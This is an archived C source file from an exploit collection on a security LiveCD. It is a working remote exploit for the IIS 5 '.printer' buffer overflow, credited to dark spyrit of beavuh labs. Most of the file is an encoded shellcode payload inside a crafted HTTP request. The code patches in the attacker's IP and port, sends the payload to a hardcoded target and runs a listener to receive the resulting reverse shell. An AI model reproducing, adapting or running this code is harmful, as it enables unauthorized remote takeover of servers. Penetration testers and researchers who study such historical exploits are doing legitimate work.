home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / iis / iisprinter.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  10.1 KB  |  264 lines
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <ctype.h>
  5. #include <pcre.h>
  6. #include <unistd.h>
  7. #include <sys/stat.h>
  8. #include <sys/time.h>
  9. #include <sys/types.h>
  10. #include <sys/socket.h>
  11. #include <netinet/in.h>
  12. #include <arpa/inet.h>
  13. #include <netdb.h>
  14. #include <fcntl.h>
  15. #include <errno.h>
  16.  
  17. #define BUF 250
  18. #define BIGBUF 1024
  19. #define LARBUF 4192
  20. #define HUGBUF 65536
  21. struct sockaddr_in serv, cli;
  22.  
  23. int listener(void);
  24. int resolve_local(char *host);
  25. int main(int argc, char **argv)
  26. {
  27.     unsigned char sploit[]=
  28. "\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
  29. "\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
  30. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  31. "\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
  32. "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
  33. "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
  34. "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
  35. "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
  36. "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
  37. "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
  38. "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
  39. "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
  40. "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
  41. "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
  42. "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
  43. "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
  44. "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
  45. "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
  46. "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
  47. "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
  48. "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
  49. "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
  50. "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
  51. "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
  52. "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
  53. "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
  54. "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
  55. "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
  56. "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
  57. "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
  58. "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
  59. "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
  60. "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
  61. "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
  62. "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
  63. "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
  64. "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
  65. "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
  66. "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
  67. "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
  68. "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
  69. "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
  70. "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
  71. "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
  72. "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
  73. "\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
  74. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  75. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  76. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  77. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  78. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  79. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  80. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  81. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  82. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  83. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  84. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  85. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  86. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  87. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  88. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  89. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  90. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  91. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
  92. "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
  93. "\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";
  94.         char                    line[51];
  95.         int             sockfd;
  96.         unsigned short int      a_port;
  97.         unsigned long           a_host;
  98.  
  99.  
  100.   bzero(&serv, sizeof(struct sockaddr));
  101.   bzero(&cli, sizeof(struct sockaddr));
  102.   serv.sin_family = AF_INET;
  103.   serv.sin_port = htons(8400);
  104.   serv.sin_addr.s_addr = inet_addr("192.168.1.135"); 
  105.        printf("iis5 remote .printer overflow.\n"
  106.                 "dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n");
  107.         bzero(&line, sizeof(line));
  108.  
  109.             printf("What port should we bind to? [need root for <= 1024]: ");
  110.             fgets(line, 50, stdin);
  111.             line[strlen(line) - 1] = '\0';
  112.  
  113.             a_port = htons(atoi(line));
  114.             cli.sin_port = htons(atoi(line));
  115.  
  116.             bzero(&line, sizeof(line));
  117.  
  118.             printf("what is our ip address?: ");
  119.             fgets(line, 50, stdin);
  120.             line[strlen(line) - 1] = '\0';
  121.             if (!resolve_local(line) == 0) {
  122.                 fprintf(stderr, "Error resolving local ip: %s\n", line);
  123.                 exit(0);
  124.             }
  125.             cli.sin_addr.s_addr = inet_addr(line);
  126.             cli.sin_family = AF_INET;
  127.  
  128.  
  129.  
  130.         a_port^=0x9595;
  131.  
  132.         a_host = *((unsigned long *)&cli.sin_addr.s_addr);
  133.         a_host^=0x95959595;
  134.  
  135.         sploit[441]= (a_port) & 0xff;
  136.         sploit[442]= (a_port >> 8) & 0xff;
  137.  
  138.         sploit[446]= (a_host) & 0xff;
  139.         sploit[447]= (a_host >> 8) & 0xff;
  140.         sploit[448]= (a_host >> 16) & 0xff;
  141.         sploit[449]= (a_host >> 24) & 0xff;
  142.  
  143.         if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  144.                 perror("socket");
  145.                 exit(1);
  146.         }
  147.  
  148.         printf("\nconnecting... \n");
  149.  
  150.         if ((connect(sockfd, (struct sockaddr *) &serv, sizeof(struct sockaddr_in))) == -1){
  151.                 perror("connect");
  152.                 exit(1);
  153.         }
  154.  
  155.         write(sockfd, sploit, strlen(sploit));
  156.         sleep (1);
  157.         close (sockfd);
  158.         printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
  159.  
  160.         /* This is our listener */
  161.         listener();
  162. /*
  163.         connfd = socket(AF_INET, SOCK_STREAM, 0);
  164.         if ( (bind(connfd, (struct sockaddr *)&cli, sizeof(struct sockaddr_in))) == -1) {
  165.              perror("bind");
  166.         }
  167.  
  168.         listen(connfd, 5);
  169.         local_len = sizeof(struct sockaddr_in);
  170.  
  171.         newfd = accept(connfd, (struct sockaddr *)&cli, &local_len);
  172.  
  173.         maxfd = newfd;
  174.  
  175.         for( ; ; ) {
  176.           FD_ZERO(&rset);
  177.           FD_SET(fileno(stdin), &rset);
  178.           FD_SET(newfd, &rset);
  179.           select(maxfd+1, &rset, NULL, NULL, NULL);
  180.  
  181.  
  182.             if (FD_ISSET(fileno(stdin), &rset)) {
  183.                 if (fgets(sendbuf, HUGBUF, stdin) == NULL)
  184.                     return (0);
  185.                     write(newfd, sendbuf, strlen(sendbuf));
  186.             }
  187.  
  188.             if (FD_ISSET(newfd, &rset)) {
  189.                 if ( (n = read(newfd, recvbuf, HUGBUF)) < 0) {
  190.                      break;
  191.                 }
  192.                 recvbuf[n] = '\0';
  193.                 fputs(recvbuf, stdout);
  194.             }
  195.         }
  196. */
  197.   return(0);
  198. }
  199. int resolve_local(char *hostname)
  200. {
  201.         struct hostent *res;
  202.  
  203.            if (inet_pton(AF_INET, hostname, &cli.sin_addr) <= 0) {
  204.                if ((res = gethostbyname(hostname)) == NULL) {
  205.                    return(1);
  206.                }
  207.                memcpy(&cli.sin_addr.s_addr, res->h_addr, res->h_length);
  208.                return(0);
  209.            }
  210.   return(0);
  211. }
  212. int listener(void)
  213. {
  214.   int connfd, maxfd, newfd, local_len, n, retval;
  215.   char sendbuf[HUGBUF + 1], recvbuf[HUGBUF + 1];
  216.   struct timeval timeout;
  217.   fd_set rset;
  218.  
  219.   bzero(&sendbuf, HUGBUF + 1);
  220.   bzero(&recvbuf, HUGBUF + 1);
  221.   FD_ZERO(&rset);
  222.   timeout.tv_sec = 5;
  223.   timeout.tv_usec = 0;
  224.         connfd = socket(AF_INET, SOCK_STREAM, 0);
  225.         if ( (bind(connfd, (struct sockaddr *)&cli, sizeof(struct sockaddr_in))) == -1) {
  226.              perror("bind");
  227.         }
  228.  
  229.         listen(connfd, 5);
  230.         local_len = sizeof(struct sockaddr_in);
  231.  
  232.         newfd = accept(connfd, (struct sockaddr *)&cli, &local_len);
  233.  
  234.         maxfd = newfd;
  235.  
  236.         for( ; ; ) {
  237.           FD_ZERO(&rset);
  238.           FD_SET(fileno(stdin), &rset);
  239.           FD_SET(newfd, &rset);
  240.           retval = select(maxfd+1, &rset, NULL, NULL, &timeout);
  241.  
  242.           if (retval) {
  243.             if (FD_ISSET(fileno(stdin), &rset)) {
  244.                 if (fgets(sendbuf, HUGBUF, stdin) == NULL)
  245.                     return (0);
  246.                     write(newfd, sendbuf, strlen(sendbuf));
  247.             }
  248.  
  249.             if (FD_ISSET(newfd, &rset)) {
  250.                 if ( (n = read(newfd, recvbuf, HUGBUF)) < 0) {
  251.                      break;
  252.                 }
  253.                 recvbuf[n] = '\0';
  254.                 fputs(recvbuf, stdout);
  255.             }
  256.           } else {
  257.             printf("ewp must have failed\n");
  258.             break;
  259.           }
  260.         }
  261.   return(0);
  262. }
  263.  
  264.